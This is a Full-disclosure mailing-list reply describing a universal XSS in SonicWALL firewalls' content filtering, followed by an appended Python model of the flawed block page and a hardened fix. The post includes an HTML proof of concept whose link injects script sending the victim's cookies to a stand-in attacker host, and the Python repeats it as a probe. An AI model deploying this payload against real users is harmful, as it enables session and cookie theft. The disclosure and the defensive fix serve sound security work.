Re: Re: Re: [Full-disclosure] Universal Website Hijacking by Exploiting Firewall Content Filtering Features + SonicWALL firewalls 0day
It is universal because any domain/website can be hijacked not because all
vendors are affected! I never claimed that all vendors are affected.
Also, the SonicWALL vuln you mentioned is NOT the same issue! That vuln affects
the web logs console of the appliance which means that exploitation is aimed at
compromising the *device* NOT websites the victim user visits.
Notice that the advisory says:
"the attacker may execute scripts automatically when the logfile is viewed."
The vuln I reported allows you to hijack any site, i.e.: run scripting code
within the security context of any website. In other words, it's not a
vulnerability that can be used to compromise the SonicWALL appliance, but
rather to steal information from any site (i.e.: an active webmail session),
steal cookies, etc ...
Furthermore, the targeted website doesn't have to be blacklisted (i.e.: adware
site), but rather *swearing terms* need to be blocked. By simply inserting a
swearing term (notice the f word) into any site's URL, script injection within
that site is possible. i.e.:
<html><head><title>SonicWall Universal XSS PoC</title></head>
<body>
<h2>SonicWall Universal XSS PoC</h2>
<a href="http://google.com/fuck#<script>location='http://evil.foo/'+document.cookie</script>">Click me!</a>
</body></html>
That's because the SonicWALL appliance replies on behalf of the requested site,
so the browser "believes" that the inserted script is actually returned by the
requested website. You could think of this as a MITM XSS.
Hope it makes sense.
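The failure mode described in this post, modelled as an added example (not code from the post or from SonicWALL): a content filter that answers in place of the requested site and reflects the raw URL into its block page, next to a hardened responder that redirects to a block host the firewall owns and HTML-escapes whatever it reflects. The blocklist, the block host name and the probe URL are constructed for the example; the model treats the whole URL string, fragment included, as the reflected value.

```python
import html
from urllib.parse import quote

# Constructed blocklist: the post says only that "swearing terms" trigger the filter.
BLOCKED_TERMS = ("fuck",)
# Hypothetical origin owned by the firewall, used only to serve block pages.
BLOCK_HOST = "https://blockpage.firewall.example"


def is_blocked(url: str) -> bool:
    """Trigger condition from the post: a blocked term anywhere in the URL."""
    return any(term in url.lower() for term in BLOCKED_TERMS)


def block_response_vulnerable(url: str) -> dict:
    """Model of the flawed behaviour: the filter answers *in place of* the
    requested site (200, same origin as far as the browser knows) and pastes
    the raw URL into its HTML, so markup in the URL becomes live script."""
    body = f"<html><body>Access to {url} is blocked by policy.</body></html>"
    return {"status": 200, "headers": {}, "body": body}


def block_response_hardened(url: str) -> dict:
    """Fix 1: never render the block page under the blocked site's origin;
    redirect to the firewall's own block host, carrying the URL as a
    percent-encoded query parameter (quote(safe='') encodes <, ', # etc.)."""
    location = f"{BLOCK_HOST}/blocked?u={quote(url, safe='')}"
    return {"status": 302, "headers": {"Location": location}, "body": ""}


def render_block_page(url: str) -> str:
    """Fix 2 (on the block host): HTML-escape anything reflected from the URL,
    so even a page rendered on the wrong origin cannot break out of the text node."""
    return (f"<html><body>Access to {html.escape(url, quote=True)} "
            f"is blocked by policy.</body></html>")


def filter_request(url: str, responder):
    """Apply the content filter; returns None when the request is passed through."""
    return responder(url) if is_blocked(url) else None


# Constructed probe modelled on the post's PoC URL.
PROBE = "http://google.com/fuck#<script>location='http://evil.foo/'+document.cookie</script>"

if __name__ == "__main__":
    print(filter_request(PROBE, block_response_vulnerable)["body"])
    print(filter_request(PROBE, block_response_hardened)["headers"]["Location"])
    print(render_block_page(PROBE))
```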